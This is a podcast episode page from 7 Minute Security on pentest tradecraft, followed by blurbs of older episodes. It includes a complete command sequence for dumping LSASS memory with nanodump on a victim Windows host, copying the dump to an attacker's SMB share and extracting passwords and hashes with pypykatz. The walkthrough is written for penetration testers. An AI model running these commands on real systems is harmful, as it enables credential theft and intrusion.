7MS #508: Tales of Pentest Pwnage - Part 33
7 Minute Security18 Helmi 2022

7MS #508: Tales of Pentest Pwnage - Part 33

Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.

We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:

# Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.com\pwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\ # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log # Victim system: Get the log back to your Kali share copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\ # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt

Enjoy delicious passwords and hashes in the dump.txt file!

Jaksot(682)

7MS #26: The Importance of Training and Awareness (audio)

7MS #26: The Importance of Training and Awareness (audio)

Training and awareness – specifically as it relates to infosec – is something companies can’t spend enough $ on. But from my experience, not enough of them are making this a front-burner priority. This episode talks about one topic I’m particularly passionate about. I call it “How not to click on bad stuff.” Download: 7MS #26:…

13 Syys 20147min

7MS #25: Writing Better Pentest Reports (audio)

7MS #25: Writing Better Pentest Reports (audio)

This episode talks about some pointers, tools and tips towards writing better pentest reports. Download: 7MS #25: Writing Better Pentest Reports (audio)

23 Elo 20148min

7MS #24: Why Wireless Scares Me (audio)

7MS #24: Why Wireless Scares Me (audio)

This episode is all about why you should (probably not) use wireless hotspots, and keeping yourself safe in general when surfing the Web. Download: 7MS #24: Why Wireless Scares Me (audio)

16 Elo 20147min

7MS #23: OSCP – part 2 (audio)

7MS #23: OSCP – part 2 (audio)

In this episode I talk more about my adventures with OSCP and Offensive Security! . Download: 7MS #23: OSCP – part 2 (audio) Show notes: I recommend documenting ALL the exercises in the PDF. My understanding is that extra effort could be rewarded if you don’t do so hot on your final exam. Buffer overflows make…

9 Elo 20147min

7MS #22: Phishing with Black Squirrel (audio)

7MS #22: Phishing with Black Squirrel (audio)

In this episode I talk about using Black Squirrel to launch phishing campaigns! Download: 7MS #22: Phishing with Black Squirrel (audio) Show notes: Security Weekly is an excellent podcast/resource. Devour it regularly. Black Squirrel is the main tool discussed in this podcast. I’ve been using it for phishing campaigns and it’s been excellent in that capacity.

27 Heinä 20147min

7MS #21: OSCP – part 1 (audio)

7MS #21: OSCP – part 1 (audio)

In this episode I talk about my venture into Offensive Security! . Download: 7MS #21: OSCP – part 1 (audio) Show notes: It’s official – I have a death wish and have started the OSCP training. This episode is the first of what I hope will be a multi-part, spoiler-free series about my experience with OSCP. With…

20 Heinä 20147min

7MS #20: Moving from GoDaddy to DNSimple (audio)

7MS #20: Moving from GoDaddy to DNSimple (audio)

In this episode I talk about why I’m pulling my domains from GoDaddy, and making DNSimple their new home. Download: 7MS #20: Moving from GoDaddy to DNSimple (audio) Show notes: The service I’m talking about in this podcast is DNSimple. Troy Hunt‘s humorous/awesome article pushed me over the edge and convinced me to give DNSimple a…

15 Heinä 20147min

7MS #19: Kioptrix! (audio)

7MS #19: Kioptrix! (audio)

In this episode I talk about a deliciously vulnerable series of VMs called Kioptrix, and how you can use them to sharpen your pentesting skills. Download: 7MS #19: Kioptrix! (audio) Show notes: The Kioptrix series of VMs is here: http://www.kioptrix.com/blog/test-page/ and here: http://vulnhub.com/?q=kioptrix&sort=date-des&type=vm. Got approved for my OSCP training and I start it in a few…

5 Heinä 20147min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
politiikan-puskaradio
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rikosmyytit
aihe
rss-mina-ukkola
rss-hyvaa-huomenta-bryssel
rss-kyselytunti
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
politbyroo
the-ulkopolitist
rss-kalevi-sorsa-saation-podcast
rss-suoraan-asiaan
rss-kaikki-paskaksi-ystavat
rss-kaikki-uusiksi
rss-raha-talous-ja-politiikka